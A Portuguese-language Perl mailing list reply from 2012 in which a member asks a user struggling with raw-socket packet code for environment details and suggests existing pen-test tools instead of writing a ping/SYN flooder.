[Rio-pm] Problemas com rawsocket

Bruno Buss bruno.buss em gmail.com
Sexta Abril 20 14:54:54 PDT 2012

Olá Aureliano,

2012/4/20 Aureliano Guedes <guedes_1000 em hotmail.com>

Faça um favor, leia isso:
http://www.catb.org/~esr/faqs/smart-questions.html

 Gabriel Vieira, se conseguisse ter acesso ao meu pc vc seria uns dos
> hacker mais fodoes do mundo, mas mesmo assim não iria conseguir nada de
> interessante,
> pois não logo nem guardo arquivos no HD.... XD, se fizer isso, faz um
> favor pra mim, formata ele pois estou com preguissa de fazer isso, instala
> ou Ubuntu ou Mandriva com
> dual boot com W7. LOL

Um dica... se alguma vez você receber uma "resposta torta", tente não
responder de forma debochada... geralmente não ajuda em anda a aliviar a
tensão da thread.

> Lorn, meu codigo esta totalmente aos pedaços, pois não to desenvolvendo um
> Syn Flood para brincar de Anonymous, estou desenvolvendo um sistema de
> pen-test,
> mas essa é so a primeira etapa. Ou seja, dividi em modulos.

Você já procurou outros "sistemas de pen-test" existentes?
Sabe, tem muita coisa aí, bem feita, onde bons programadores já colocaram
horas de esforço...

Nos casos onde você não tenha encontrado *nada* que te atenda (o que não
creio que seja o caso de alguma coisa que faz um flood de ping...) e/ou
teve uma ideia super revolucionária... não seria então melhor contribuir
pro que já existe, de forma a melhor aproveitar o seu tempo?

Enfim... supondo que seja um projeto para estudo próprio (e um pouco de
tempo sobrando)...

Como as pessoas já disseram, você precisa dar mais informações sobre seu
ambiente.
Qual SO está usando? (Tenho uma "leve" sensação que é Windows, mas não
custa perguntar...) Está em uma conta com privilégios (por exemplo, no caso
de ambientes unix, algumas funcionalidade do nmap dão erro quando
utilizadas a partir de uma conta de "usuário normal", simplesmente por
falta de privilégio.)

Você já conseguiu fazer esse pacote funcionar pelo menos uma vez? Pingando
só um IP e uma porta específica, ou nem isso acontece?
Você tem o raio da libpcap instalada, testada e funcionando?
Versão do Perl instalada? Versão dos módulos instalados?

[ ]'s

Bruno C. Buss
http://www.brunobuss.net